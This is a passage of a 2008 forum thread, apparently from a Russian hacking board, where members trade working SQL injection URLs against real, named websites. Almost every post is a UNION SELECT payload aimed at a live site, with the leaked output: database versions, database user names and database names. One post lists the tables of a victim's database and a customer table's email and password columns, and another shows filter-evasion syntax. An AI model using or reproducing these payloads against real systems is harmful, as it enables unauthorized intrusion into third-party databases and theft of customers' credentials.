SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+CONCAT(0x3a,Version(),0x3a),2,3,4,5,6,7,8,9/*
    Version() - 5.0.19
    Database() - presscenter


    Code:
    http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+table_name,2,3,4,5,6,7,8,9+from+information_schema.tables+limit+17,1/*
     
    #7161 R1dex, 28 Dec 2008
    Last edited: 28 Dec 2008
  2. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    How did you work out that you need to enumerate up to 9 at the start? Even if you go all the way up to 999 there, the message doesn't change!
     
  3. masternet

    masternet Elder

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    Are you sure? Have you come across SQL injections where, for example, instead of an error there is a message like "Hacking attempt" or something similar..
    It's the same here.. this is not a standard SQL injection..
    And the digit one is escaped in the error..
    ----
    Germani, if there is a difference in the output, then it's an SQL injection (i.e. if there is a message for 1 but not for 999, or vice versa)
     
    #7163 masternet, 28 Dec 2008
    Last edited: 28 Dec 2008
  4. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Yes, by the way! I've come across those, on ntu.kz: at even the slightest probe for an SQL injection, it prints something like: "Hacker's attack attempt, admin was informed"
     
  5. R1dex

    R1dex Elder

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    "AMTEL company. From its first days, the company's main line of business has been network projects and the supply of servers and systems of the highest class of fault tolerance..."

    Code:
    http://www.amtel.ru/page.php?id=-1+union+select+version()/*
    Code:
    http://presscenter.kz/index.php?show=news&id=-1+order+by+10/*
    
    Code:
    http://presscenter.kz/index.php?show=news&id=-1+order+by+9/*
     
  6. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.izba.kz/ru/pages/index.php?id=-1+union+select+1,2,3,4,5,6,version(),8,user(),10,11,12,13,14,15,16,17,18,19,20--

    4.1.22-STANDARD
    siteis_user@localhost
     
  7. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.suncar.kz/index.php?id=1+union+select+unhex(hex(concat(table_name))),database(),version(),user()+from+information_schema.tables--
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.readplus.com.au/blog_detail.php?id=239+union+select+1,version(),3,4,5,6,7,8,9/*
    4.1.22-standard

    Code:
    http://www.egd.com/pages/blog_detail.php?id=-11+union+select+1,2/*
    Code:
    http://www.publicaffairsnetworking.com/blog_detail.php?id=-29+union+select+1,version(),3,4,5,6/*
    5.0.45

    Code:
    http://hddvdmovieguide.com/blog_detail.php?id=-64+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16/*
    4.1.22-standard

    Code:
    http://www.dvdmovieguide.com/blog_detail.php?id=-10+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16/*
    4.1.22-standard

    Code:
    http://www.visitmaldives.com/ru/Where_to_stay/cruise-boat.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    4.1.22-standard

    Code:
    http://nauticaseychelles.com/boat.php?id=-37+union+select+1,version(),3,4,5,6/*
    4.1.22-standard-log

    Code:
    http://www.pelicanmarine.com.au/boat.php?ID=-1018+union+select+1,version(),3,4,5,6,7,8,9,10/*
    4.1.22-standard 3

    Code:
    http://www.gosail.com/boat.php?display=-29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--
    5.0.67-community

    Code:
    http://www.mclayboats.co.nz/boat.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
    4.0.27-standard-log
     
    _________________________
    #7168 yarbabin, 28 Dec 2008
    Last edited: 28 Dec 2008
    2 people like this.
  9. Ershik

    Ershik Elder

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    I don't really like posting links.. couldn't resist.
    The site is dedicated to PHP programming. Sort of like php.net :)
    http://www.phpbuddy.com/article.php?id=-1+union+select+1,2,3,4,5,6/*
    phpbud22_phpbudd@localhost_4.1.21-standard
     
  10. попугай

    попугай Elder

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Innatack.Ru
    For some reason it only shows up in Opera .... no idea why..
    http://www.inattack.ru/program/662.html'


    At the very bottom of the page, and at the bottom of the source -
    I tried to take it further - it isn't working for some reason.. maybe it's a fake?
     
  11. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.emctc.ru/cgi-bin/db_new_logist.cgi?num=-1+union+select+1,column_name,3+from+information_schema.columns+where+table_name='item'--




    Is it just me, or are all the folders empty? :confused:
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.claptonweb.com/boots/boot.php?id=-124+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17/*
    5.0.45-Debian_1ubuntu3.3-log

    Code:
    http://www.cfsontario.ca/english/general.php?id=11111111111111111+union+select+1,2,3,version(),5,6,7,8,9,10,11/*
    5.0.45-log

    Code:
    http://www.akg-russia.ru/about.php?id=-4+union+select+1,2,3,4,5/*
    Code:
    http://www.akg-russia.ru/about.php?id=-4+union+select+1,2,3,4,5/*
    Code:
    http://www.greetingcard.org/about.php?ID=-2+union+select+1,version(),3,4,5,6,7,8,9,10--
    5.0.67

    Code:
    http://www.tptherapy.com/about.php?id=-19'+union+select+1,2,3,version(),5,6,7,8,9/*
    4.1.22-standard

    Code:
    http://www.mlsoftball.com/about.php?ID=-2+union+select+1,2,version()/*
    4.0.27-standard
    Code:
    http://www.palit.biz/main/about.php?id=-1+union+select+1,2,3,4,version(),6,7/*
    4.1.21

    Code:
    http://www.demotech.org/d-about.php?id=-3+union+select+1,version(),3,4,5,6/*
    5.0.32-Debian_7etch1

    Code:
    http://www.artmaterial.ru/about.php?content=dealer&id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*
    4.1.22-standard-log

    Code:
    http://www.ywamyork.com/about/about.php?id=-11+union+select+1,version(),3,4,5,6,7,8,9--
    5.0.67-community-log

    Code:
    http://www.personal.in.ua/article.php?ida=-346+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
    
    4.1.22

    Code:
    http://www.brain-storming.info/article.php?ida=-70+union+select+1/*
     
    _________________________
  13. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.projector-club.ru/index.php?id=9&manuf=-1+union+select+user(),2,3,version(),5,6,7,8,9,10,11,12,database(),14,15,16,17,18,19,20--

    olimpor_project@localhost
    olimpor_projector
    4.1.22-standard-log
     
    1 person likes this.
  14. I love this game

    I love this game Elder

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Code:
    _http://en.apa.az/news.php?id=-89125+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
    5.0.67-community

    Code:
    _http://www.aupe.org/in_the_news/news.php?id=-993+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    4.0.18

    Code:
    _http://www.avezdoaluno.com.br/navegacao/prof.php?id=-53+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15--
    5.0.67-log

     
    #7174 I love this game, 29 Dec 2008
    Last edited: 29 Dec 2008
    3 people like this.
  15. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.mibf.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

    I've gone blind!!!
     
  16. sabe

    sabe Elder

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Tkastrey.ru - PR5 ~4k
    logical output, branch 4..

    Arkhangel.ru - PR3 ~5k
    branch 5, there's no forum table in the database(
     
    #7176 sabe, 29 Dec 2008
    Last edited: 29 Dec 2008
  17. Pashkela

    Pashkela Dinosaur

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    heh-heh, http://arkhangel.ru/phpBB2/

    of course there isn't
     
  18. Pashkela

    Pashkela Dinosaur

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    I'll be giving out New Year's presents too :))

    Tables found:
    -------
    article
    content
    customer
    news
    orders
    partner
    session
    shops
    -------
    =============================
    Columns found in table customer:
    -------
    email
    password
    status
    username
    =============================
     
    #7178 Pashkela, 29 Dec 2008
    Last edited: 29 Dec 2008
  19. vladvk

    vladvk New Member

    Joined:
    22 Dec 2008
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Can someone explain what this junk is? I've already found around three dozen with this junk:
    http://www.ac-alp.ru/part/index.php?id=-42+order+by+10--
    And it tells me:
     
  20. Kakoytoxaker

    Kakoytoxaker Elder

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    vladvk, that's filtering of "+", " ", I don't know, maybe something else too, I didn't look )
    http://www.ac-alp.ru/part/index.php?id=-41/**/union/**/select/**/1,2,concat_ws(0x3a,User(),Database(),Version()),4,5,6,7

    PS Questions go in the neighbouring thread (for the future)
    PPS
    I did ask you not to write nonsense :)
     
    #7180 Kakoytoxaker, 29 Dec 2008
    Last edited: 29 Dec 2008